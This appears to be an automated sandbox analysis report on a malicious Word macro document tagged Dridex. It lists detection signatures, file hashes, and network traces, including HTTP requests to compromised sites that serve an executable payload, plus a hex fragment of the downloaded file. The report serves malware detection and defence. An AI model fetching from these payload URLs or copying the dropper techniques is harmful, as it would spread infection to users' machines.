Analysis Report SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc

Overview

General Information

Sample Name: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc
Analysis ID: 333829
MD5: c6dcea39dc372b31101a825cbae8ef7e
SHA1: 1f30f04ad381c5736c363cf00abb9618a9d4cc91
SHA256: 382c7e5429e0a66875f2600b0d32709e7d3b836fbb8328a42f94ecf11572029a
Tags: Dridex

Most interesting Screenshot:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded macro with GUI obfuscation
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Virustotal: Detection: 43% Perma Link
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Windows\Temp\5xta3.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.rundll32.exe.1d0000.1.unpack Avira: Label: TR/ATRAPS.Gen2

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wellnessway.co.za
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 41.185.8.141:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 41.185.8.141:443

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 24 Dec 2020 03:45:42 GMTContent-Type: application/octet-streamContent-Length: 192512Connection: keep-aliveContent-Transfer-Encoding: BinaryX-User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Last-Modified: Thu, 01 Jan 1970 00:00:00 GMTX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: W NC:000000 UP:Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 00 a2 9e 69 61 cc cd 69 61 cc cd 69 61 cc cd 07 3c ce cc d2 60 cc cd 77 33 4f cd f2 60 cc cd 9b 38 cd cc 7c 60 cc cd bb 3a cc cc 95 61 cc cd 72 fc 56 cd ba 61 cc cd 72 fc 66 cd dc 60 cc cd 64 33 13 cd 98 61 cc cd 14 18 10 cd 9b 61 cc cd 9b 38 cc cc 44 61 cc cd dc ff 10 cd e3 60 cc cd 9b 38 cd cc c4 61 cc cd fe 3f c8 cc 3a 61 cc cd 06 17 67 cd f9 61 cc cd ab 8d 02 cd 53 60 cc cd ab 8d 02 cd b5 61 cc cd 64 33 13 cd 91 61 cc cd f2 8a 00 cd 36 60 cc cd fb 3f cf cc 37 61 cc cd dc ff 11 cd 93 60 cc cd 77 33 5e cd 2b 60 cc cd 4c 16 12 cd 0a 60 cc cd 72 fc 67 cd 24 61 cc cd 52 69 63 68 69 61 cc cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 0e e4 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 01 00 50 00 00 00 10 00 00 00 10 00 00 40 57 00 00 00 10 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 05 00 00 00 05 00 02 00 00 00 00 00 00 10 03 00 00 10 00 00 00 00 00 00 02 00 44 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 63 00 00 b4 00 00 00 00 70 02 00 88 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 b4 01 00 00 73 60 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 4f 00 00 00 10 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e7 07 00 00 00 60 00 00 00 10 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nx3jY0Jl.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sypher.bizConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: explainervideoz.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: penniesforsense.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 24 Dec 2020 03:45:42 GMTContent-Type: application/octet-streamContent-Length: 192512Connection: keep-aliveContent-Transfer-Encoding: BinaryX-User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Last-Modified: Thu, 01 Jan 1970 00:00:00 GMTX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: W NC:000000 UP:Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 00 a2 9e 69 61 cc cd 69 61 cc cd 69 61 cc cd 07 3c ce cc d2 60 cc cd 77 33 4f cd f2 60 cc cd 9b 38 cd cc 7c 60 cc cd bb 3a cc cc 95 61 cc cd 72 fc 56 cd ba 61 cc cd 72 fc 66 cd dc 60 cc cd 64 33 13 cd 98 61 cc cd 14 18 10 cd 9b 61 cc cd 9b 38 cc cc 44 61 cc cd dc ff 10 cd e3 60 cc cd 9b 38 cd cc c4 61 cc cd fe 3f c8 cc 3a 61 cc cd 06 17 67 cd f9 61 cc cd ab 8d 02 cd 53 60 cc cd ab 8d 02 cd b5 61 cc cd 64 33 13 cd 91 61 cc cd f2 8a 00 cd 36 60 cc cd fb 3f cf cc 37 61 cc cd dc ff 11 cd 93 60 cc cd 77 33 5e cd 2b 60 cc cd 4c 16 12 cd 0a 60 cc cd 72 fc 67 cd 24 61 cc cd 52 69 63 68 69 61 cc cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 0e e4 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 01 00 50 00 00 00 10 00 00 00 10 00 00 40 57 00 00 00 10 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 05 00 00 00 05 00 02 00 00 00 00 00 00 10 03 00 00 10 00 00 00 00 00 00 02 00 44 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 63 00 00 b4 00 00 00 00 70 02 00 88 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 b4 01 00 00 73 60 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 4f 00 00 00 10 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e7 07 00 00 00 60 00 00 00 10 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A170CE5-5575-4F65-9737-3BA52E43A74D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /nx3jY0Jl.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sypher.bizConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: explainervideoz.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: penniesforsense.comConnection: Keep-Alive
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comx equals www.linkedin.com (Linkedin)
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: wellnessway.co.za
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Dec 2020 03:45:37 GMTServer: ApacheKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://cert.int-x3.letsencrypt.org/03
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: WMIC.exe, 00000002.00000002.2390608354.0000000004D1F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WMIC.exe, 00000002.00000003.2138832985.000000000335E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WMIC.exe, 00000002.00000003.2125352127.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138583662.000000000252C000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php.NET4.0E)
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php.NET4.0E)W
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.phpET4.0E)
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.phpO
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php~
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php/v
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.phpN
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.phpO
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: WMIC.exe, 00000002.00000002.2388627093.0000000004760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385724336.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.2385309728.0000000001C00000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000003.2139050094.0000000002525000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://sypher.biz/nx3jY0Jl.php
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.php7
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.phpbre
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.phpz
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WMIC.exe, 00000002.00000002.2388627093.0000000004760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385724336.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: WMIC.exe, 00000002.00000002.2390355286.0000000004C36000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: WMIC.exe, 00000002.00000002.2389961464.0000000004B50000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
